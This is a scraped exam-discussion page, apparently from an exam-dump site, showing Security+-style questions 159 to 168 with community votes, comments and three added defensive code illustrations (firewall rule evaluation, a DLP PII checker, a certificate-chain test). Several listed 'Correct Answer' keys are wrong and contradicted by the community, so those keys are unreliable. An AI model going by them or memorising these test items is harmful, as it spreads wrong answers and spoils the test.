upvoted 3 times
  inkedia3 4 months, 1 week ago
Wrote the exam yesterday and passed. Please pay attention to these PBQs; they were all on the exam. Funny, I wasn't paying much attention to
them till about three hours before my exam. Anyway, I passed with a 785 score... I will say give these questions 90% of your attention and look for
the 10% from other sources...
upvoted 3 times

  comeragh 4 months, 3 weeks ago


D - I agree with D being the correct answer here
upvoted 1 times
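A first-match policy evaluator, added here as an example (not part of the question or of any commenter's post), to make the point the thread settles on concrete: a ruleset that ends in allow-any leaks every port it does not explicitly name, while one that ends in deny-any exposes only the listed ports. Option D is transcribed from the comments above; the rows of option C are an assumption built from the remarks that it denies TCP 80 and ends with allow-any, and options A and B are images on the original page and are not reproduced.

```python
from dataclasses import dataclass
from typing import Union

PortSpec = Union[int, str]   # a TCP/UDP port number, or "any"


@dataclass(frozen=True)
class Rule:
    src: str        # source address; "any" in every rule discussed above
    dst: str        # destination address; likewise "any"
    proto: str      # "tcp", "udp" or "any"
    port: PortSpec  # destination port or "any"
    action: str     # "allow" or "deny"

    def matches(self, proto: str, port: int) -> bool:
        return self.proto in ("any", proto) and self.port in ("any", port)


def evaluate(policy: list[Rule], proto: str, port: int) -> str:
    """First-match semantics: the first rule whose criteria fit decides; no match means deny."""
    for rule in policy:
        if rule.matches(proto, port):
            return rule.action
    return "deny"


# Option C's rows are assumed (deny 80, allow 443, allow everything else);
# option D is as transcribed in the comments above.
POLICY_C = [
    Rule("any", "any", "tcp", 80, "deny"),
    Rule("any", "any", "tcp", 443, "allow"),
    Rule("any", "any", "any", "any", "allow"),
]
POLICY_D = [
    Rule("any", "any", "tcp", 80, "allow"),
    Rule("any", "any", "tcp", 443, "allow"),
    Rule("any", "any", "any", "any", "deny"),
]

# Ports an external scan of a web server would probe: the web ports plus a
# few services that should never be reachable from the Internet.
PROBE_PORTS = (22, 23, 80, 443, 3389, 8080)
REQUIRED_PORTS = frozenset({80, 443})


def exposed_ports(policy: list[Rule], proto: str = "tcp", ports=PROBE_PORTS) -> list[int]:
    """Ports the policy lets through, as a scanner from an 'any' source would see them."""
    return [p for p in ports if evaluate(policy, proto, p) == "allow"]


def unnecessary_openings(policy: list[Rule], required=REQUIRED_PORTS, ports=PROBE_PORTS) -> list[int]:
    """Allowed ports beyond what the web server needs: what the analyst in the question found."""
    return sorted(set(exposed_ports(policy, "tcp", ports)) - set(required))


if __name__ == "__main__":
    for name, policy in (("C", POLICY_C), ("D", POLICY_D)):
        print(f"option {name}: exposed {exposed_ports(policy)}, unnecessary {unnecessary_openings(policy)}")
```

The evaluator's fallback is deny, which is also the behaviour of most real firewalls with no matching rule; option C's explicit allow-any overrides that fallback, which is exactly why it fails the review.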


Question #159 Topic 1

A large bank with two geographically dispersed data centers is concerned about major power disruptions at both locations. Every day each
location experiences very brief outages that last for a few seconds. However, during the summer a high risk of intentional brownouts that last up
to an hour exists, particularly at one of the locations near an industrial smelter. Which of the following is the BEST solution to reduce the risk of
data loss?

A. Dual supply

B. Generator

C. UPS

D. POU

E. Daily backups

Correct Answer: B

Community vote distribution


C (69%) B (25%) 6%

  apata123 Highly Voted  3 months ago


If UPS is not in the options, the answer here is generator... I passed my exam and this question appeared, but UPS wasn't in the options, so I went
with generator...
upvoted 12 times

  stoneface Highly Voted  5 months ago


Selected Answer: C
UPS is the answer, don't get confused by the smelter thing
upvoted 11 times

  Thanks_stoneface 1 day, 21 hours ago


Thanks stoneface
upvoted 1 times

  varun0 5 months ago


Agreed, also a generator takes time to get up and going.
upvoted 1 times

  Bogardinc Most Recent  1 week ago


Data center generators are the insurance you need against catastrophic system failure and data loss. Backup power supplies can provide a
reliable power source for hours or days, and it is wise to consider redundant generators for critical systems.

https://2nsystems.com/products/power/data-center-generator/#:~:text=GENERATORS%20CAN%20SAVE%20YOUR%20DATA%20CENTER&text=After%20utility%20power%20is%20restored,even%20when%20backups%20occur%20frequently.
upvoted 1 times

  PraygeForPass 3 weeks, 1 day ago


I like UPS as an answer as they mention outages can last up to an hour and from my work experience most UPS can last between 1-3 hours, so
hopefully power is up by then.
upvoted 1 times

  Boubou480 4 weeks ago


Selected Answer: C
The best solution to reduce the risk of data loss in this situation would be to use a UPS (uninterruptible power supply). A UPS is a device that
provides a backup power source to critical systems and equipment in the event of a power outage or disruption. It works by providing a
temporary power supply to the system using batteries, allowing the system to continue running until a permanent power source can be restored.
This would be particularly useful in the case of brief power outages or brownouts, as it would allow the data centers to continue operating
without experiencing any disruption or data loss. Other options, such as dual supply, generator, or point-of-use (POU) systems, may also be
effective in certain situations, but a UPS is generally the most reliable and efficient option for protecting against power disruptions. Daily backups
are important for protecting against data loss, but they alone may not be sufficient to prevent data loss in the event of a prolonged power outage
or disruption.
upvoted 1 times

  Tayfay 4 weeks, 1 day ago


Selected Answer: C
UPS
- Uninterruptible Power Supply
- Short-term backup power
- Blackouts, brownouts, surges


Straight from Professor Messer’s slides
upvoted 1 times
  JustInTime23 1 month, 2 weeks ago
Professor Messer's video on this specifically mentions UPS as the solution for brownouts with a duration of 1 hr or less
upvoted 2 times

  [Removed] 1 month, 3 weeks ago


Selected Answer: B
Can you use a generator during a brownout?

Your best bet for dealing with a brownout or a blackout is to have a reliable generator on-site. That way, you won't have to worry about the length
or impact of your power outage, because you'll be equipped with a steady source of power at the ready. Plus, in this scenario we are talking
about “Data Centers” as a whole, not your phone or headphones that need power. We are talking about powering big hardware all around the
DC…
upvoted 1 times

  mlonz 6 days, 13 hours ago


STFU, don't give wrong answers, you are playing with people's lives
upvoted 1 times

  Ranaer 3 weeks, 1 day ago


Yes, however all the infrastructure could go down in the time between the start of the brownout and the generator being up and running to
provide backup electricity. Which is why UPS is the solution. The concern here isn't availability, but rather preventing data loss. UPS will
provide the window in which systems can be safely shut down in order to preserve them. UPS works instantly, and gives you the buffer
required for the infrastructure to safely shut down.
upvoted 1 times

  GetBuckets 2 months ago


From Ian Neil's book: “UPS is designed to keep the system going for a few minutes, to allow the server team to close the servers down gracefully.”
This will prevent data loss. Since the question talks about avoiding data loss only, then the best answer is UPS.
upvoted 1 times

  afazaeli 2 months ago


E: daily backups would be the only choice to reduce the risk of data loss.
upvoted 1 times

  Blueteam 2 months, 2 weeks ago


The correct answer is B. Generator.
We are not talking about a single monitor or computer here. We are talking about a data center. If you have a rack of a few switches and servers, a
monitor, FW etc., you will not get away with a UPS for an hour unless you have a couple of HEAVY duty UPSes.
In fact both are needed, UPS and generator. However, if you need to supply power for an hour to a data center, then you need a generator.
upvoted 3 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: C
Everything up to 1h can be covered by a UPS. If it needs longer support, you'd have to go with a generator
upvoted 2 times

  zharis 3 months, 1 week ago


Selected Answer: C
A UPS is always required to protect against any interruption to computer services. A backup generator cannot be brought online fast enough to
respond to a power failure.
upvoted 2 times

  RawToast 3 months, 1 week ago


UPS means uninterruptable power supply. For those whose brains are melted from all of CompTIA's acronym usage.
upvoted 3 times

  Imanism 3 months, 2 weeks ago


Selected Answer: C
a brownout is an intentional or unintentional drop in voltage in an electrical power supply system.
upvoted 1 times

  deeden 4 months, 1 week ago


Selected Answer: C
I agree with option C. A large bank experiencing daily outages and has no UPS to begin with will have a very bad impression indeed :)
upvoted 1 times

  Jakalan7 4 months, 2 weeks ago


There is an argument for E, since the question asks for the "BEST solution to reduce the risk of data loss" - none of the other technologies
explicitly protect against data loss other than daily backups though.

That being said.... UPS seems like the 'obvious' answer.

I'm just not sure if this is a trick question or not.



upvoted 2 times

Question #160 Topic 1

Which of the following would be the BEST way to analyze diskless malware that has infected a VDI?

A. Shut down the VDI and copy off the event logs.

B. Take a memory snapshot of the running system.

C. Use NetFlow to identify command-and-control IPs.

D. Run a full on-demand scan of the root volume.

Correct Answer: C

Community vote distribution


B (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: B
Taking a snapshot of the VDI would allow us to both analyze and temporarily isolate the threat, as we can then shut it down to proceed to further analyze
the snapshot
upvoted 19 times

  ronniehaang Most Recent  4 days, 5 hours ago


Selected Answer: B
B. Take a memory snapshot of the running system.

To analyze diskless malware that has infected a Virtual Desktop Infrastructure (VDI), it would be best to take a memory snapshot of the running
system. The malware, being diskless, is likely to exist only in memory, not on disk. A memory snapshot captures the state of the system's memory at
a specific point in time and can be analyzed offline, allowing the security analyst to identify and analyze the malware without risking further
spread. The memory snapshot can be used to analyze the running processes, loaded modules, and other system activity to determine the source
and nature of the malware.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
The best way to analyze diskless malware that has infected a VDI would be to take a memory snapshot of the running system. This would
capture the state of the system's memory at the time the snapshot was taken, including any malware that may be present in memory. This would
allow analysts to examine the malware without running the risk of infecting other systems or allowing the malware to continue operating.
Additionally, taking a memory snapshot would allow analysts to examine the malware without shutting down the VDI, which could disrupt other
users and potentially cause data loss. Using NetFlow to identify command-and-control IPs and running a full on-demand scan of the root volume
would not be as effective in analyzing diskless malware, as they would not provide direct access to the malware itself. Copying off the event logs
would also not be as effective, as they may not contain detailed information about the malware.
upvoted 1 times

  lucasvs_ 5 months ago


Selected Answer: B
Taking a snapshot of the VDI would allow us to both analyze and temporarily isolate the threat, as we can then shut it down to proceed to further analyze
the snapshot
upvoted 2 times


Question #161 Topic 1

Users are presented with a banner upon each login to a workstation. The banner mentions that users are not entitled to any reasonable
expectation of privacy and access is for authorized personnel only. In order to proceed past that banner, users must click the OK button. Which of
the following is this an example of?

A. AUP

B. NDA

C. SLA

D. MOU

Correct Answer: B

Community vote distribution


A (82%) B (18%)

  Vishnuks Highly Voted  5 months, 1 week ago


Answer is A (Acceptable use policy)
upvoted 17 times

  Sir_Learnalot Most Recent  2 months, 3 weeks ago


Selected Answer: A
This is a common use for an AUP
upvoted 2 times

  studant_devsecops 2 months, 3 weeks ago


Selected Answer: B
In the AUP there is no agreement. The banner that is displayed informs you that, as soon as you pass the banner by clicking "OK", there is an
agreement
upvoted 2 times

  tibetbey 4 months, 4 weeks ago


Selected Answer: A
An acceptable use policy (AUP) is a document that outlines the rules and restrictions employees must follow in regard to the company's network,
software, internet connection and devices.
upvoted 2 times

  lucasvs_ 5 months ago


Selected Answer: A
Answer is A (Acceptable use policy)
upvoted 2 times

  enginne 5 months ago


Who sets the answers to these questions? I think TROLLs: NDA? haha
upvoted 4 times

  okay123 5 months ago


Selected Answer: A
NDA is a non-disclosure agreement, which is like agreeing to not discuss something, but an Acceptable Use Policy is being made aware of something,
like a Terms of Use policy, so that nobody can sue your organization because they can't say you didn't know (legally)
upvoted 3 times


Question #162 Topic 1

The Chief Information Security Officer is concerned about employees using personal email rather than company email to communicate with
clients and sending sensitive business information and PII. Which of the following would be the BEST solution to install on the employees'
workstations to prevent information from leaving the company's network?

A. HIPS

B. DLP

C. HIDS

D. EDR

Correct Answer: D

Community vote distribution


B (71%) D (29%)

  tibetbey Highly Voted  4 months, 4 weeks ago


Selected Answer: B
DLP enables businesses to detect data loss, as well as prevent the illicit transfer of data outside the organization and the unwanted destruction
of sensitive or personally identifiable data (PII).
upvoted 9 times

  Joe1984 5 months ago


Shouldn't this be DLP? (Data Loss Prevention)
upvoted 7 times

  enginne 5 months ago


DLP is good answer
upvoted 3 times

  carpathia Most Recent  2 months, 2 weeks ago


Selected Answer: B
EDR includes DLP, but it (EDR) would not be necessary here, a bit of an overkill. DLP is OK.
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


I'll go with DLP on this one. EDR is a software agent that collects system data and logs for analysis by a monitoring system to provide early
detection of threats. It's not so much about preventing bad things. The problem is there are a dozen different solutions out there with different
acronyms. I guess an EPP (Endpoint Protection Platform) could be mistaken for EDR here. EPP solutions will act on these things as they often
include DLP, HIDS/HIPS, firewall and AV in one package...but I guess this also depends on the definition. Long story short, I think it's "B" DLP in
this case
upvoted 1 times

  zharis 3 months, 1 week ago


Selected Answer: B
DLP is a software solution that detects and prevents sensitive information from being stored on unauthorized systems or transmitted over
unauthorized networks
upvoted 2 times

  CertAddict69 4 months, 2 weeks ago


Selected Answer: B
The answer is B. D would be over thinking it.
upvoted 3 times

  KetReeb 5 months ago


Selected Answer: D
I believe D is correct since EDR includes some DLP for endpoints:
Endpoint detection and response (EDR) solutions are integrated solutions that combine individual endpoint security functions into a complete
package. Having a packaged solution makes updating easier, and frequently these products are designed to integrate into an enterprise-level
solution with a centralized management platform. Some of the common EDR components include antivirus, anti-malware, software patching,
firewall, and DLP solutions. Unified endpoint management (UEM) is a newer security model that focuses on the managing and securing devices
in an enterprise such as desktops, laptops, smartphones, and other devices from a single location.
upvoted 6 times

  J_Ark1 2 months, 4 weeks ago


You are correct in another circumstance but not in this one, as the wording of the question suggests that the company doesn't want any
sensitive data leaving its archives via unauthorised means, hence a rule has to be set in place to prevent exfiltration of data, hence DLP.

upvoted 1 times
  andrizo 3 months, 3 weeks ago
DLP operates on streams, and with NGFW/browsers
https://www.youtube.com/watch?v=eEdD30nYm_k
upvoted 1 times

  deeden 4 months, 1 week ago


I'm a bit confused by how the question is worded. The CISO's concern is clearly the use of personal emails. So, if employees send
sensitive info via corporate email, is it okay? Or maybe the corporate email security is hardened and has DLP already, and they can't
implement DLP on personal emails, e.g. Yahoo Mail? Then the solution must be to block the use of personal emails on any endpoint corporate
devices, which could be a reverse-proxy solution, or an MDM solution for mobile devices, I think. Not sure if EDR is capable of both?
upvoted 2 times

  RonWonkers 4 months, 2 weeks ago


Information not being allowed to leave the company network == DLP any time
upvoted 1 times
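What the DLP agent the thread settles on actually does at the endpoint, added here as an example and not part of the question or of any commenter's post: it inspects one outbound message (sender, recipients, body), looks for PII with an SSN pattern and Luhn-validated card numbers, and blocks the message when that data would leave the corporate domain through a personal mailbox or to an external recipient. The corporate domain `example.com`, the addresses and the message body are constructed for the example; the card number is the well-known 4111... test PAN, not real data.

```python
import re

CORPORATE_DOMAINS = frozenset({"example.com"})   # assumed company mail domain

# SSN in the 123-45-6789 form, excluding area/group/serial values that are
# never issued, so ordinary numbers are less likely to be flagged.
SSN_RE = re.compile(r"\b(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")
# Candidate payment card numbers: 13-19 digits with optional space/dash
# separators; each candidate is confirmed with the Luhn check below.
CARD_RE = re.compile(r"\b(?:\d[ -]?){13,19}\b")


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 checksum used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def find_pii(text: str) -> list[tuple[str, str]]:
    """(kind, matched text) for every SSN and Luhn-valid card number in the text."""
    findings = [("ssn", m.group()) for m in SSN_RE.finditer(text)]
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if luhn_ok(digits):
            findings.append(("card", m.group()))
    return findings


def mail_domain(address: str) -> str:
    return address.rsplit("@", 1)[-1].lower()


def inspect_message(sender: str, recipients: list[str], body: str) -> tuple[str, list[str]]:
    """DLP verdict for one outbound message as seen by the endpoint agent.

    block  - PII is leaving the company domain (personal sender or external recipient)
    report - a personal mailbox is used for business mail, but nothing sensitive was found
    allow  - everything else
    """
    outside = [a for a in (sender, *recipients) if mail_domain(a) not in CORPORATE_DOMAINS]
    pii = find_pii(body)
    if pii and outside:
        return "block", [f"{kind} {value!r} would reach {', '.join(outside)}" for kind, value in pii]
    if mail_domain(sender) not in CORPORATE_DOMAINS:
        return "report", [f"personal mailbox {sender} used for business mail"]
    return "allow", []


if __name__ == "__main__":
    # Constructed message: made-up SSN and the 4111... test card number.
    body = "Per our call: SSN 219-09-9999, card 4111 1111 1111 1111. Regards"
    print(inspect_message("jdoe@gmail.com", ["client@partner.example"], body))
```

The split between "block" and "report" is the practical difference between DLP and a policy control: content that matches a PII rule is stopped, while a personal mailbox with nothing sensitive in the message is a policy violation that is logged for the CISO rather than blocked outright.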


Question #163 Topic 1

On the way into a secure building, an unknown individual strikes up a conversation with an employee. The employee scans the required badge at
the door while the unknown individual holds the door open, seemingly out of courtesy, for the employee. Which of the following social engineering
techniques is being utilized?

A. Shoulder surfing

B. Watering-hole attack

C. Tailgating

D. Impersonation

Correct Answer: A

Community vote distribution


C (83%) A (17%)

  Vishnuks Highly Voted  5 months, 1 week ago


Answer C (Tailgating)
upvoted 13 times

  CertAddict69 Highly Voted  4 months, 2 weeks ago


Selected Answer: C
Tailgating is following someone who has access to a secure area into that area without having access yourself.

Shoulder surfing is looking at information that someone who has access to it is looking at, over their shoulder or while they have it open to view,
when you shouldn't otherwise have access to that information. This sounds more like tailgating than shoulder surfing for sure.
upvoted 5 times

  FMMIR Most Recent  1 month, 3 weeks ago


Selected Answer: C
The social engineering technique being utilized in this scenario is tailgating. Tailgating, also known as piggybacking, is a tactic in which an
attacker follows an authorized individual into a secure area without being properly authorized. In this scenario, the unknown individual is using the
employee's act of scanning their badge at the door and holding the door open as an opportunity to gain unauthorized access to the secure
building. This tactic exploits the natural tendency of people to be helpful and courteous, and can be difficult to prevent without strict security
measures in place.
upvoted 1 times

  zharis 3 months, 1 week ago


Selected Answer: C
Striking up a conversation on the way to a secure building gives the idea of him following the employee. Tailgating is absolutely the answer.
upvoted 1 times

  Callie_Cassanova 3 months, 2 weeks ago


Selected Answer: A
The question does not mention that the person holding the door follows them in. I think it is shoulder surfing because the question mentions that
the employee scans the required badge to enter the building which makes me think that the person holding the door is shoulder surfing to see
which badge is being used for entry. If it was tailgating shouldn't the question mention that they followed them in?
upvoted 2 times

  J_Ark1 2 months, 4 weeks ago


True, however the key words are "conversation" and "holding the door open out of kindness", hence tailgating, as they are building trust and
eventually will follow them in, but I agree that sometimes even the best exams have typos in them :)
upvoted 1 times

  ergo54 3 months, 4 weeks ago


Selected Answer: C
Folks, this is NOT shoulder surfing. If this question is even on the test, please pick Tailgating with confidence. Shouldn't have to explain this.
upvoted 4 times

  pdbone 4 months ago


Shoulder surfing? That is not possible
upvoted 1 times

  andrizo 3 months, 3 weeks ago


what would they even be looking at? no device to monitor
upvoted 1 times


  DandyAndy 4 months, 1 week ago


Selected Answer: C
It is tailgating. At my old job (not IT) we called it shadowing when a patient would try to follow you out of a lockdown/inpatient facility.
upvoted 2 times

  Swarupam 4 months, 4 weeks ago


Selected Answer: C
Clear case of tailgating
upvoted 2 times

  comeragh 5 months ago


Selected Answer: C
This is tailgating people
upvoted 2 times

  varun0 5 months ago


Selected Answer: C
Tailgating
upvoted 2 times

  Josh_Feng 5 months ago


Selected Answer: A
Shoulder surfing is when you acquire information by looking over someone shoulder... it should be tailgating.
upvoted 2 times

  Josh_Feng 5 months ago


Answer is C. can't edit my vote.
upvoted 3 times

  Joe1984 5 months ago


That would be tailgating Answer is C
upvoted 5 times

  Wildstar 5 months ago


Why is this not tailgating?
upvoted 5 times


Question #164 Topic 1

Two hospitals merged into a single organization. The privacy officer requested a review of all records to ensure encryption was used during record
storage, in compliance with regulations. During the review, the officer discovered that medical diagnosis codes and patient names were left
unsecured. Which of the following types of data does this combination BEST represent?

A. Personal health information

B. Personally identifiable information

C. Tokenized data

D. Proprietary data

Correct Answer: B

Community vote distribution


A (92%) 8%

  stoneface Highly Voted  5 months ago


Selected Answer: A
This is PHI -> Personal Health Information
upvoted 14 times

  AidenB4704 Most Recent  1 month, 2 weeks ago


Selected Answer: A
PHI - "BEST" Represents
upvoted 2 times

  VendorPTS 4 months ago


Selected Answer: A
Seems like it has to be A (Personal Health Information - PHI), though I almost selected PII under the assumption that it was a trick question since
PHI is supposed to be Protected Health Information, not Personal Health Information, but that's probably overthinking it. I agree with A as the
best choice.
upvoted 2 times

  omodara 4 months, 1 week ago


Agree with A. Protected health information PHI is a subset of PII, but it specifically refers to health information shared with HIPAA covered
entities. Medical records, lab reports, and hospital bills are PHI, along with any information relating to an individual’s past, present, or future
physical or mental health.
upvoted 3 times

  comeragh 5 months ago


Selected Answer: A
Agree with A - PHI
upvoted 1 times

  lucasvs_ 5 months ago


Selected Answer: A
This is PHI -> Personal Health Information
upvoted 1 times

  k9_462 5 months ago


Selected Answer: B
B - when you tie PHI (diagnoses codes) to a name, it becomes PII.
upvoted 2 times

  k9_462 5 months ago


Upon reconsidering, I may go with A - PHI
upvoted 1 times

  Dachosenone 5 months ago


Selected Answer: A
"medical diagnosis codes and patient names were left unsecured" which makes it > Personal Health Information
upvoted 2 times

  Joe1984 5 months ago


Selected Answer: A


I think PHI, this is pretty specific the medical records.


upvoted 2 times


Question #165 Topic 1

A company discovered that terabytes of data have been exfiltrated over the past year after an employee clicked on an email link. The threat
continued to evolve and remain undetected until a security analyst noticed an abnormal amount of external connections when the employee was
not working. Which of the following is the MOST likely threat actor?

A. Shadow IT

B. Script kiddies

C. APT

D. Insider threat

Correct Answer: D

Community vote distribution


C (80%) D (20%)

  KetReeb Highly Voted  5 months ago


Answer is C: First, it is not an insider threat, since it occurred after an attack on the user, and then continues without the user's interaction.
From All-in-one: An APT attack is characterized by using toolkits to achieve a presence on a target network and then, instead of just moving to
steal information, focusing on the long game by maintaining a persistent presence on the target network. The tactics, tools, and procedures of
APTs are focused on maintaining administrative access to the target network and avoiding detection. Then, over the long haul, the attacker can
remove intellectual property and more from the organization, typically undetected.
upvoted 17 times

  stoneface Highly Voted  5 months ago


Selected Answer: C
Concur with KetReeb, this is clearly an APT
upvoted 12 times

  Gino_Slim 3 months, 1 week ago


In stoneface trust...that they trust KetReeb
upvoted 2 times

  Zoluson Most Recent  4 days, 11 hours ago


Selected Answer: D
APT isn't a threat actor.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
Based on the information provided, the most likely threat actor in this scenario is an insider threat. This means that the threat was likely carried
out by an employee or contractor of the company, who had access to the company's data and networks. Insider threats can be difficult to detect
and prevent, as the person carrying out the threat has legitimate access to the company's systems and data. In this case, it seems that the
employee may have been tricked into clicking on a malicious link in an email, which allowed the threat actor to gain access to the company's
systems and exfiltrate data over a period of time.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


The most likely threat actor in this situation is an insider threat. This is because the employee's actions (clicking on an email link) enabled the
threat to continue undetected for an extended period of time. An Advanced Persistent Threat (APT) is also a possibility, but it is less likely
because APTs are typically carried out by highly-skilled and well-funded attackers, whereas in this case, the employee's actions were the
cause of the data exfiltration. Shadow IT and script kiddies are less likely threat actors in this situation because they are typically associated
with unauthorized or unskilled use of technology, and there is no indication that this was the case in this situation.
upvoted 1 times

  RobbieAmy 2 months ago


Also concur with KetReeb....the only logical answer here is APT
upvoted 1 times

  studant_devsecops 3 months, 2 weeks ago


Selected Answer: D
The question does not refer to the threat itself, but the probable actor.
Right answer is D
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


That is incorrect. You overthought it. The attack occurred ON the employee. It never stated that the employee themselves did it.

upvoted 2 times
  ExamTopicsDiscussor 4 months ago
Script kiddies? LOL!
upvoted 3 times

  Halaa 4 months, 2 weeks ago


Selected Answer: C
An advanced persistent threat (APT) is a covert cyber attack on a computer network where the attacker gains and maintains unauthorized access
to the targeted network and remains undetected for a significant period.
upvoted 2 times

  J_Ark1 2 months, 4 weeks ago


That's what made me think A, but yeah, I agree with C.
upvoted 1 times

  ksave 4 months, 2 weeks ago


Selected Answer: C
Undetected for long period of time --> APT
upvoted 2 times


Question #166 Topic 1

An untrusted SSL certificate was discovered during the most recent vulnerability scan. A security analyst determines the certificate is signed
properly and is a valid wildcard. This same certificate is installed on the other company servers without issue. Which of the following is the MOST
likely reason for this finding?

A. The required intermediate certificate is not loaded as part of the certificate chain.

B. The certificate is on the CRL and is no longer valid.

C. The corporate CA has expired on every server, causing the certificate to fail verification.

D. The scanner is incorrectly configured to not trust this certificate when detected on the server.

Correct Answer: B

Community vote distribution


A (100%)

  db97 Highly Voted  4 months, 1 week ago


Answer is A.

I will share with you part of my experience while performing vuln scans: most of the time the scanning engine will require a root CA certificate (if
needed) to get more accurate results in regards to the scan. If a root CA certificate is not provided and an SSL certificate is located on a server, the
result will be that it is "untrusted", so we have to load the root one and the warning will disappear :)
upvoted 13 times
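The chain problem behind answer A, reproduced with a throwaway PKI as an added example (not code from the page or the ExamTopics discussion): a verifier that trusts only the root rejects the wildcard leaf until the intermediate is supplied, which is exactly what a scanner reports when a server does not send its intermediate. All subjects, file names and the verify_chain helper are constructed for this example.

```shell
#!/bin/sh
# Added example: build root -> intermediate -> wildcard leaf in a temp dir and
# check the leaf with and without the intermediate. Every name is constructed.
set -eu
WORK="$(mktemp -d)"

# Self-signed root CA (openssl's default v3_ca profile marks it CA:TRUE).
openssl req -x509 -newkey rsa:2048 -nodes -days 2 -subj "/CN=Example Root CA" \
  -keyout "$WORK/root.key" -out "$WORK/root.pem" 2>/dev/null

# Intermediate CA signed by the root, constrained to issue end-entity certs only.
openssl req -newkey rsa:2048 -nodes -subj "/CN=Example Intermediate CA" \
  -keyout "$WORK/int.key" -out "$WORK/int.csr" 2>/dev/null
printf 'basicConstraints=critical,CA:TRUE,pathlen:0\nkeyUsage=critical,keyCertSign,cRLSign\n' \
  > "$WORK/int.ext"
openssl x509 -req -in "$WORK/int.csr" -CA "$WORK/root.pem" -CAkey "$WORK/root.key" \
  -CAcreateserial -days 2 -extfile "$WORK/int.ext" -out "$WORK/int.pem" 2>/dev/null

# Wildcard leaf signed by the intermediate (the "valid wildcard" in the question).
openssl req -newkey rsa:2048 -nodes -subj "/CN=*.example.internal" \
  -keyout "$WORK/leaf.key" -out "$WORK/leaf.csr" 2>/dev/null
printf 'basicConstraints=CA:FALSE\nsubjectAltName=DNS:*.example.internal\n' > "$WORK/leaf.ext"
openssl x509 -req -in "$WORK/leaf.csr" -CA "$WORK/int.pem" -CAkey "$WORK/int.key" \
  -CAcreateserial -days 2 -extfile "$WORK/leaf.ext" -out "$WORK/leaf.pem" 2>/dev/null

# verify_chain ROOT LEAF [INTERMEDIATE]: prints "trusted" or "untrusted".
# The third argument stands in for the intermediate a server should send.
verify_chain() {
  root="$1"; leaf="$2"; inter="${3:-}"
  if [ -n "$inter" ]; then
    openssl verify -CAfile "$root" -untrusted "$inter" "$leaf" >/dev/null 2>&1 \
      && echo trusted || echo untrusted
  else
    openssl verify -CAfile "$root" "$leaf" >/dev/null 2>&1 \
      && echo trusted || echo untrusted
  fi
}

# Scanner that only has the root and a server that omits the intermediate:
echo "without intermediate: $(verify_chain "$WORK/root.pem" "$WORK/leaf.pem")"
# Same leaf once the intermediate is part of the presented chain:
echo "with intermediate:    $(verify_chain "$WORK/root.pem" "$WORK/leaf.pem" "$WORK/int.pem")"
```

Against a live host the equivalent check is the chain shown by `openssl s_client -showcerts`; a leaf that is not followed by its issuer there will be flagged the same way.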

  yorkwu Highly Voted  5 months ago


Selected Answer: A
"This same certificate is installed on the other company servers without issue" -> I think the certificate is still valid, so the answer is A
upvoted 9 times

  banditring 5 months ago


That's exactly what I'm thinking. Answer B makes no sense.
upvoted 2 times

  zharis Most Recent  3 months, 1 week ago


Selected Answer: A
Should be A, period
upvoted 2 times

  kennyleung0514 3 months, 3 weeks ago


Selected Answer: A
Because the certificate is valid on other servers.
So it seems to be chain issue
upvoted 2 times

  abrilo 3 months, 3 weeks ago


If someone tries to use a device that doesn't have that trust in place, a message will appear that says the certificate is not trusted. That's why
it's very common to distribute your CA certificates to all of your devices, and that will ensure that your root CA, intermediate CA, and all of the
other CAs which you're using are trusted internally.
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: A
I think A, because the others don't work
upvoted 1 times

  enginne 4 months, 4 weeks ago


Selected Answer: A
Self-signed certificate
upvoted 2 times


Question #167 Topic 1

A company wants to improve end users' experiences when they log in to a trusted partner website. The company does not want the users to be
issued separate credentials for the partner website. Which of the following should be implemented to allow users to authenticate using their own
credentials to log in to the trusted partner's website?

A. Directory service

B. AAA server

C. Federation

D. Multifactor authentication

Correct Answer: B

Community vote distribution


C (100%)

  Vishnuks Highly Voted  5 months, 1 week ago


Answer C (Federation)
upvoted 13 times

  zharis Most Recent  3 months, 1 week ago


Selected Answer: C
Federation means the company trusts accounts created and managed by a different network. It connects the identity management services of
multiple systems
upvoted 1 times

  kennyleung0514 3 months, 3 weeks ago


Selected Answer: C
SSO ---> thus it's federate
upvoted 1 times

  ksave 4 months, 2 weeks ago


Selected Answer: C
Federation
upvoted 2 times

  ahmadawni 4 months, 3 weeks ago


Selected Answer: C
Federation :)
upvoted 2 times

  Swarupam 4 months, 4 weeks ago


Selected Answer: C
C should be the correct one
upvoted 2 times

  banditring 5 months ago


Imma go with C, Federation because of this definition I found in this book:
Federation or federated identity is a means of linking a subject's accounts from several sites, services, or entities in a single account. It's a means
to accomplish single sign-on, thus making service/site access easier for visitors and reducing the number of unique logon credential sets that a
user has to create, store, manage, and secure.
upvoted 3 times

  okay123 5 months ago


Selected Answer: C
Federation: A process that allows for the conveyance of identity and authentication information across a set of networked systems

Think eduroam https://eduroam.org/


upvoted 3 times


Question #168 Topic 1

A company is under investigation for possible fraud. As part of the investigation, the authorities need to review all emails and ensure data is not
deleted. Which of the following should the company implement to assist in the investigation?

A. Legal hold

B. Chain of custody

C. Data loss prevention

D. Content filter

Correct Answer: B

Community vote distribution


A (91%) 5%

  stoneface Highly Voted  5 months ago


Selected Answer: A
A. Legal hold
upvoted 12 times

  Josh_Feng 5 months ago


I agree, you need legal hold to make sure its not deleted, while chain of custody is to make sure it is not modified.
upvoted 8 times

  ZDW Most Recent  1 week, 4 days ago


Selected Answer: C
Why A or B? A company doesn't put a legal hold on itself; that is done by the authorities, and the chain of custody is also done by the investigators.
The only thing here the company could do to itself that makes sense is C, DLP.
upvoted 1 times

  nicekoda 1 month ago


Answer A: A legal hold, also known as a litigation hold, is the process by which organizations preserve potentially relevant information when
